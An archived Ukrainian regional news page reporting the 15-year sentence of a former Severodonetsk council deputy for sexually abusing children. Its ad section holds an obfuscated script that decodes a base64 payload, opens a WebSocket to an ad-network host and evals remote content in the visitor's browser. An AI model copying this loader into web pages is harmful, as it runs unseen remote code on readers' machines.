<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего депутата Северодонецкого городского совета за совершение изнасилования несовершеннолетних и малолетних детей. Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего">
<meta name="keywords" content="детей, несовершеннолетних, Луганской, области, свободы, малолетних, изнасилования, половой, годам, лишения, Северодонецкого, городского, совета, совершение, бывший, совершал, депутат, городской, Северодонецкий, депутата">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы">
<meta property="og:url" content="http://www.citynews.net.ua/news/83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-06/thumbs/1592837581_sudd.jpg">
<meta property="og:description" content="Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего депутата Северодонецкого городского совета за совершение изнасилования несовершеннолетних и малолетних детей. Как сообщает со ссылкой пресс-служба прокуратуры Луганской области, Северодонецким городским">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы</h1>
<a href="http://www.citynews.net.ua/2020/06/22/" ><span class="date">Вчера, 17:53</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html" data-title="В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><a href="http://www.citynews.net.ua/uploads/posts/2020-06/1592837581_sudd.jpg" class="highslide" target="_blank"><img src="/uploads/posts/2020-06/thumbs/1592837581_sudd.jpg" alt="" style="float:left;"></a>Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего депутата Северодонецкого городского совета за совершение изнасилования несовершеннолетних и малолетних детей.</p>
<p>Как сообщает со ссылкой пресс-служба прокуратуры Луганской области, Северодонецким городским судом Луганской области к 15 годам лишения свободы приговорен бывший депутат Северодонецкого городского совета (VI созыва) за совершение изнасилования несовершеннолетних и малолетних детей, насильственное удовлетворение половой страсти неестественным способом, развращения несовершеннолетних (ч. 3, 4 ст. 152, ч. 3 ст. 153, ч. ч. 1, 2 ст. 156 УК Украины).</p>
<p>Сообщается, что стороной обвинения доказано, что бывший депутат горсовета с 2006 по 2012 годы систематически совершал преступления против половой свободы и половой неприкосновенности в отношении малолетних и несовершеннолетних. Под предлогом показа кино, мультфильмов и других развлечений он приглашал детей к себе домой, склонял их к употреблению алкогольных напитков и совершал над ними сексуальное насилие.</p>
<p>В уголовном производстве задокументировано 14 эпизодов совершения развратных и насильственных действий в отношении 6 детей в возрасте от 6 до 15 лет. Самая младшая пострадавшая была его родной племянницей.</p>
<p>В то же время обвиняемый своей вины не признал и в содеянном не раскаялся.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/ukrainenews/61721-apellyacionnyy-sud-ostavil-bez-izmeneniy-prigovor-mariupolskomu-pastoru-pedofilu-13-let-tyurmy.html">Апелляционный суд оставил без изменений приговор мариупольскому пастору-педофилу: 13 лет тюрьмы</a></li><li><a href="http://www.citynews.net.ua/news/48285-delo-milicionera-iz-batalona-tornado-napravili-v-sud.html">Дело милиционера из батальона «Торнадо» направили в суд</a></li><li><a href="http://www.citynews.net.ua/news/27710-nasilnika-iz-perevalskogo-rayona-posadyat-na-5-let.html">Насильника из Перевальского района посадят на 5 лет</a></li><li><a href="http://www.citynews.net.ua/news/15237-luganskaya-miliciya-otkazadas-vozbuzhdat-ugolovnye-dela-protiv-pedofilov.html">Луганская милиция отказалась возбуждать уголовные дела против педофилов</a></li><li><a href="http://www.citynews.net.ua/news/11051-byvshego-nardepa-lozinskogo-prigovorili-k-15-godam-tyurmy.html">Бывшего нардепа Лозинского приговорили к 15 годам тюрьмы</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Вчера, 21:13</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83979-v-ivano-frankovskoj-i-chernovickoj-oblastjah-jevakuirujut-sela-iz-za-pavodka-foto.html">В Ивано-Франковской  и Черновицкой областях эвакуируют села из-за паводка - фото</a></h4><span>Вчера, 17:53</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html">В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы</a></h4><span>Вчера, 15:04</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83976-spasateli-v-luganskoj-oblasti-3-raza-vyezzhali-na-likvidaciju-pozharov-v-jekosistemah-obschej-ploschadju-6-ga.html">Спасатели в Луганской области 3 раза выезжали на ликвидацию пожаров в экосистемах общей площадью 6 га</a></h4><span>Вчера, 14:40</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83975-zelenskij-i-nardepy-otmenili-dpa-v-ukraine-dlja-9-klassnikov.html">Зеленский и нардепы отменили ДПА в Украине для 9-классников</a></h4><span>Вчера, 14:30</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83974-projti-kpvv-v-stanice-luganskoj-teper-mozhno-pri-sobljudenii-uslovij-terroistov.html">Пройти КПВВ в Станице Луганской теперь можно при соблюдении условий террористов</a></h4><span>Вчера, 13:52</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83973-do-23-ijunja-okkupirovannye-rf-goroda-luganskoj-oblasti-ostalis-bez-vody.html">До 23 июня оккупированные РФ города Луганской области остались без воды</a></h4><span>Вчера, 12:46</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83971-rossijskie-terroristy-nachali-propusk-grazhdan-cherez-kpvv-novotroickoe-v-doneckoj-oblasti.html">Российские террористы начали пропуск граждан через КПВВ «Новотроицкое» в Донецкой области</a></h4><span>Вчера, 12:39</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83970-policejskie-nashli-17-letnjuju-zhitelnicu-ivano-frankovska-sbezhavshuju-v-luganskuju-oblast.html">Полицейские нашли 17-летнюю жительницу Ивано-Франковска сбежавшую в Луганскую область</a></h4><span>Вчера, 11:16</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83969-sbu-obvinjaet-byvshego-voennogo-v-podgotovke-vzryva-gospitalja-v-severodonecke.html">СБУ обвиняет бывшего военного  в подготовке взрыва госпиталя в Северодонецке</a></h4><span>Вчера, 10:32</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83967-luganskaja-zarja-obygrala-desnu-na-vyezde.html">Луганская «Заря» обыграла «Десну» на выезде</a></h4><span>Вчера, 10:01</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83966-21-ijunja-v-ukraine-vyjavlen-681-novyj-sluchaj-covid-19.html">21 июня в Украине выявлен 681 новый случай COVID-19</a></h4><span>Вчера, 09:55</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83965-obem-gaza-v-podzemnyh-hranilischah-ukrainy-po-sostojaniju-na-20-ijunja-uvelichilsja-do-1922-mlrd-kubometrov.html">Объем газа в подземных хранилищах Украины по состоянию на 20 июня увеличился до 19,22 млрд кубометров</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Вчера, 21:13</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83979-v-ivano-frankovskoj-i-chernovickoj-oblastjah-jevakuirujut-sela-iz-za-pavodka-foto.html">В Ивано-Франковской  и Черновицкой областях эвакуируют села из-за паводка - фото</a></h4><span>Вчера, 11:05</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83968-s-22-ijunja-v-odesse-usilili-karantin.html">С 22 июня в Одессе усилили карантин</a></h4><span>21-06-2020, 11:33</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83958-v-kieve-proizoshel-vzryv-v-zhilom-dome-pod-zavalom-nahodjatsja-ljudi.html">В Киеве произошел взрыв в жилом доме -  под завалом находятся люди</a></h4><span>17-06-2020, 10:45</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83939-v-odesse-kriminalnye-avtoritety-ustroili-razborki-so-strelboj.html">В Одессе криминальные авторитеты устроили разборки со стрельбой</a></h4><span>16-06-2020, 16:28</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83935-v-rovenskoj-oblasti-izjali-jantarja-na-12-milliona-dollarov-ssha.html">В Ровенской области изъяли янтаря на 1,2 миллиона долларов США</a></h4><span>15-06-2020, 13:30</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83918-v-kieve-zapreschajut-kupatsja-na-pljazhah.html">В Киеве запрещают купаться на пляжах</a></h4><span>15-06-2020, 09:30</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83913-v-odesse-umerla-uchastnica-ultramarafona.html">В Одессе умерла участница ультрамарафона</a></h4><span>12-06-2020, 13:53</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83903-ukraina-otkryvaet-kpvv-na-granice-s-okkupirovannym-krymom.html">Украина открывает КПВВ на границе с оккупированным Крымом</a></h4><span>12-06-2020, 10:40</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83898-v-odesse-sbu-presekla-dejatelnost-konvertacionnogo-centra-s-oborotom-500-mln-griven.html">В Одессе СБУ пресекла деятельность конвертационного центра с оборотом 500 млн гривень</a></h4><span>9-06-2020, 19:25</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83880-vozle-odesskogo-rynka-7-j-kilometr-obokrali-sklad-na-70-tysjach-dollarov.html">Возле Одесского рынка 7 й километр обокрали склад на 70 тысяч долларов</a></h4><span>9-06-2020, 14:33</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83878-v-kieve-poka-ne-mogut-perejti-k-sledujuschemu-jetapu-oslablenija-karantina-i-otkryt-kafe-restorany-i-bassejny.html">В Киеве пока не могут перейти к следующему этапу ослабления карантина и открыть кафе, рестораны и бассейны</a></h4><span>9-06-2020, 12:25</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83875-v-dvuh-selah-odesskoj-oblasti-vvodjat-rezhim-chs-iz-za-koronavirusa.html">В двух селах Одесской области вводят режим ЧС из-за коронавируса</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('05','2020','right'); return false;" href="http://www.citynews.net.ua/2020/05/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Июнь 2020&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/01/" title="Все публикации за 01 июня 2020">1</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/02/" title="Все публикации за 02 июня 2020">2</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/03/" title="Все публикации за 03 июня 2020">3</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/04/" title="Все публикации за 04 июня 2020">4</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/05/" title="Все публикации за 05 июня 2020">5</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/06/06/" title="Все публикации за 06 июня 2020">6</a></td><td  class="weekday" >7</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/08/" title="Все публикации за 08 июня 2020">8</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/09/" title="Все публикации за 09 июня 2020">9</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/10/" title="Все публикации за 10 июня 2020">10</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/11/" title="Все публикации за 11 июня 2020">11</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/12/" title="Все публикации за 12 июня 2020">12</a></td><td  class="weekday" >13</td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/06/14/" title="Все публикации за 14 июня 2020">14</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/15/" title="Все публикации за 15 июня 2020">15</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/16/" title="Все публикации за 16 июня 2020">16</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/17/" title="Все публикации за 17 июня 2020">17</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/18/" title="Все публикации за 18 июня 2020">18</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/19/" title="Все публикации за 19 июня 2020">19</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/06/20/" title="Все публикации за 20 июня 2020">20</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/06/21/" title="Все публикации за 21 июня 2020">21</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/06/22/" title="Все публикации за 22 июня 2020">22</a></td><td  class="day day-current" >23</td><td  class="day" >24</td><td  class="day" >25</td><td  class="day" >26</td><td  class="weekday" >27</td><td  class="weekday" >28</td></tr><tr><td  class="day" >29</td><td  class="day" >30</td><td colspan="5">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего депутата Северодонецкого городского совета за совершение изнасилования несовершеннолетних и малолетних детей. Северодонецкий городской суд Луганской области приговорил к 15 годам лишения свободы бывшего">
<meta name="keywords" content="детей, несовершеннолетних, Луганской, области, свободы, малолетних, изнасилования, половой, годам, лишения, Северодонецкого, городского, совета, совершение, бывший, совершал, депутат, городской, Северодонецкий, депутата">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="В Северодонецке депутата-педофила приговорили к 15 годам тюрьмы">
<meta property="og:url" content="http://www.citynews.net.ua/news/83977-v-severodonecke-deputata-pedofila-prigovorili-k-15-godam-tjurmy.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-06/thumbs/1592837581_sudd.jpg">
